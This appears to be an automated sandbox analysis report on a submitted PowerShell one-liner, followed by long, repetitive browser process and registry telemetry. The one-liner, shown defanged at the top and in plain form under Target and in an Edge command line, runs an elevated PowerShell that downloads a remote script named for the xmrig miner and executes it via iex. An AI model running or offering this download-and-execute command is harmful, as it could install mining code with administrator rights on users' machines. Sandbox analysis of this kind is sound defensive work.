hxxp://start-process PowerShell -verb runas irm hxxps://raw[.]githubusercontent[.]com/Lachine1/xmrig-scripts/main/windows[.]ps1 | iex

Analysis

max time kernel
91s
max time network
95s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
25/06/2024, 01:15

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex

Score

3^/10

defense_evasion privilege_escalation

Malware Config

Signatures

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
3636	msedge.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Enumerates system info in registry 2 TTPs 8 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133637517825283808"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	firefox.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
3044	msedge.exe
3044	msedge.exe
3636	msedge.exe
3636	msedge.exe
2312	identity_helper.exe
2312	identity_helper.exe
6736	chrome.exe
6736	chrome.exe

Suspicious behavior: LoadsDriver 14 IoCs

pid	Process
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
660	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 20 IoCs

pid	Process
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
3636	msedge.exe

Suspicious use of AdjustPrivilegeToken 56 IoCs

description	pid	Process
Token: SeDebugPrivilege	2428	firefox.exe
Token: SeDebugPrivilege	2428	firefox.exe
Token: SeShutdownPrivilege	6736	chrome.exe
Token: SeCreatePagefilePrivilege	6736	chrome.exe
Token: SeShutdownPrivilege	6736	chrome.exe
Token: SeCreatePagefilePrivilege	6736	chrome.exe
Token: SeShutdownPrivilege	6736	chrome.exe
Token: SeCreatePagefilePrivilege	6736	chrome.exe
Token: SeShutdownPrivilege	6736	chrome.exe
Token: SeCreatePagefilePrivilege	6736	chrome.exe
Token: SeShutdownPrivilege	6736	chrome.exe
Token: SeCreatePagefilePrivilege	6736	chrome.exe
Token: SeShutdownPrivilege	6736	chrome.exe
Token: SeCreatePagefilePrivilege	6736	chrome.exe
Token: SeShutdownPrivilege	6736	chrome.exe
Token: SeCreatePagefilePrivilege	6736	chrome.exe
Token: SeShutdownPrivilege	6736	chrome.exe
Token: SeCreatePagefilePrivilege	6736	chrome.exe
Token: SeShutdownPrivilege	6736	chrome.exe
Token: SeCreatePagefilePrivilege	6736	chrome.exe
Token: SeShutdownPrivilege	6736	chrome.exe
Token: SeCreatePagefilePrivilege	6736	chrome.exe
Token: SeShutdownPrivilege	6736	chrome.exe
Token: SeCreatePagefilePrivilege	6736	chrome.exe
Token: SeShutdownPrivilege	6736	chrome.exe
Token: SeCreatePagefilePrivilege	6736	chrome.exe
Token: SeShutdownPrivilege	6736	chrome.exe
Token: SeCreatePagefilePrivilege	6736	chrome.exe
Token: SeShutdownPrivilege	6736	chrome.exe
Token: SeCreatePagefilePrivilege	6736	chrome.exe
Token: SeShutdownPrivilege	6736	chrome.exe
Token: SeCreatePagefilePrivilege	6736	chrome.exe
Token: SeShutdownPrivilege	6736	chrome.exe
Token: SeCreatePagefilePrivilege	6736	chrome.exe
Token: SeShutdownPrivilege	6736	chrome.exe
Token: SeCreatePagefilePrivilege	6736	chrome.exe
Token: SeShutdownPrivilege	6736	chrome.exe
Token: SeCreatePagefilePrivilege	6736	chrome.exe
Token: SeShutdownPrivilege	6736	chrome.exe
Token: SeCreatePagefilePrivilege	6736	chrome.exe
Token: SeShutdownPrivilege	6736	chrome.exe
Token: SeCreatePagefilePrivilege	6736	chrome.exe
Token: SeShutdownPrivilege	6736	chrome.exe
Token: SeCreatePagefilePrivilege	6736	chrome.exe
Token: SeShutdownPrivilege	6736	chrome.exe
Token: SeCreatePagefilePrivilege	6736	chrome.exe
Token: SeShutdownPrivilege	6736	chrome.exe
Token: SeCreatePagefilePrivilege	6736	chrome.exe
Token: SeShutdownPrivilege	6736	chrome.exe
Token: SeCreatePagefilePrivilege	6736	chrome.exe
Token: SeShutdownPrivilege	6736	chrome.exe
Token: SeCreatePagefilePrivilege	6736	chrome.exe
Token: SeShutdownPrivilege	6736	chrome.exe
Token: SeCreatePagefilePrivilege	6736	chrome.exe
Token: SeShutdownPrivilege	6736	chrome.exe
Token: SeCreatePagefilePrivilege	6736	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
2428	firefox.exe
2428	firefox.exe
2428	firefox.exe
2428	firefox.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
2428	firefox.exe
2428	firefox.exe
2428	firefox.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe
6736	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2428	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3636 wrote to memory of 764	3636	msedge.exe	81
PID 3636 wrote to memory of 764	3636	msedge.exe	81
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 1256	3636	msedge.exe	82
PID 3636 wrote to memory of 3044	3636	msedge.exe	83
PID 3636 wrote to memory of 3044	3636	msedge.exe	83
PID 3636 wrote to memory of 644	3636	msedge.exe	84
PID 3636 wrote to memory of 644	3636	msedge.exe	84
PID 3636 wrote to memory of 644	3636	msedge.exe	84
PID 3636 wrote to memory of 644	3636	msedge.exe	84
PID 3636 wrote to memory of 644	3636	msedge.exe	84
PID 3636 wrote to memory of 644	3636	msedge.exe	84
PID 3636 wrote to memory of 644	3636	msedge.exe	84
PID 3636 wrote to memory of 644	3636	msedge.exe	84
PID 3636 wrote to memory of 644	3636	msedge.exe	84
PID 3636 wrote to memory of 644	3636	msedge.exe	84
PID 3636 wrote to memory of 644	3636	msedge.exe	84
PID 3636 wrote to memory of 644	3636	msedge.exe	84
PID 3636 wrote to memory of 644	3636	msedge.exe	84
PID 3636 wrote to memory of 644	3636	msedge.exe	84
PID 3636 wrote to memory of 644	3636	msedge.exe	84
PID 3636 wrote to memory of 644	3636	msedge.exe	84
PID 3636 wrote to memory of 644	3636	msedge.exe	84
PID 3636 wrote to memory of 644	3636	msedge.exe	84
PID 3636 wrote to memory of 644	3636	msedge.exe	84
PID 3636 wrote to memory of 644	3636	msedge.exe	84

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
1⤵
- Access Token Manipulation: Create Process with Token
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xd8,0x114,0x7ff8c04046f8,0x7ff8c0404708,0x7ff8c0404718
  2⤵
  PID:764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,1257249703936715233,15828759793569963998,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
  2⤵
  PID:1256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,1257249703936715233,15828759793569963998,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,1257249703936715233,15828759793569963998,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2676 /prefetch:8
  2⤵
  PID:644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,1257249703936715233,15828759793569963998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
  2⤵
  PID:4564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,1257249703936715233,15828759793569963998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
  2⤵
  PID:3968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,1257249703936715233,15828759793569963998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4076 /prefetch:1
  2⤵
  PID:2576
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,1257249703936715233,15828759793569963998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3672 /prefetch:1
  2⤵
  PID:5116
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,1257249703936715233,15828759793569963998,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4004 /prefetch:8
  2⤵
  PID:3380
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,1257249703936715233,15828759793569963998,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4004 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,1257249703936715233,15828759793569963998,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4744 /prefetch:1
  2⤵
  PID:4108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,1257249703936715233,15828759793569963998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3788 /prefetch:1
  2⤵
  PID:1384
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,1257249703936715233,15828759793569963998,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3724 /prefetch:1
  2⤵
  PID:2908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,1257249703936715233,15828759793569963998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:1
  2⤵
  PID:4152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,1257249703936715233,15828759793569963998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4440 /prefetch:1
  2⤵
  PID:2740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,1257249703936715233,15828759793569963998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4360 /prefetch:1
  2⤵
  PID:3160
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,1257249703936715233,15828759793569963998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1
  2⤵
  PID:4324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,1257249703936715233,15828759793569963998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1
  2⤵
  PID:2288
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,1257249703936715233,15828759793569963998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2976 /prefetch:1
  2⤵
  PID:468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,1257249703936715233,15828759793569963998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4896 /prefetch:1
  2⤵
  PID:1776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,1257249703936715233,15828759793569963998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:1
  2⤵
  PID:4908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,1257249703936715233,15828759793569963998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2976 /prefetch:1
  2⤵
  PID:6100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,1257249703936715233,15828759793569963998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1
  2⤵
  PID:1764

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1484

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4236

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:3668
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:2428
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2428.0.744213076\1321437733" -parentBuildID 20230214051806 -prefsHandle 1772 -prefMapHandle 1764 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {48f327df-9887-4c16-8246-66b55bed49db} 2428 "\\.\pipe\gecko-crash-server-pipe.2428" 1852 24ba3a10b58 gpu
    3⤵
    PID:3476
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2428.1.1130799481\614207503" -parentBuildID 20230214051806 -prefsHandle 2392 -prefMapHandle 2380 -prefsLen 22112 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {961f4fdc-2243-4f86-989c-4d87fb49a11f} 2428 "\\.\pipe\gecko-crash-server-pipe.2428" 2420 24b96c8a558 socket
    3⤵
    PID:1584
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2428.2.1353326411\452031469" -childID 1 -isForBrowser -prefsHandle 2960 -prefMapHandle 2956 -prefsLen 22150 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b60b9d3-2e92-4124-b3ce-e41306bbbc05} 2428 "\\.\pipe\gecko-crash-server-pipe.2428" 2972 24ba62d1e58 tab
    3⤵
    PID:2960
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2428.3.2630796\1349685933" -childID 2 -isForBrowser -prefsHandle 3848 -prefMapHandle 3844 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {68223ac3-e796-4e93-9034-7f1b232881f5} 2428 "\\.\pipe\gecko-crash-server-pipe.2428" 3852 24ba8a83d58 tab
    3⤵
    PID:5220
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2428.4.8187225\610354375" -childID 3 -isForBrowser -prefsHandle 4796 -prefMapHandle 4792 -prefsLen 27692 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {82ba297b-8a09-491a-8547-13920549567f} 2428 "\\.\pipe\gecko-crash-server-pipe.2428" 4808 24ba93e3b58 tab
    3⤵
    PID:5596
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2428.5.567203109\1444171431" -childID 4 -isForBrowser -prefsHandle 4948 -prefMapHandle 4952 -prefsLen 27692 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d15e4e49-65da-44ce-b7af-c3e2338581d1} 2428 "\\.\pipe\gecko-crash-server-pipe.2428" 4940 24baa28a558 tab
    3⤵
    PID:5604
- - C:\Program Files\Mozilla Firefox\firefox.exe
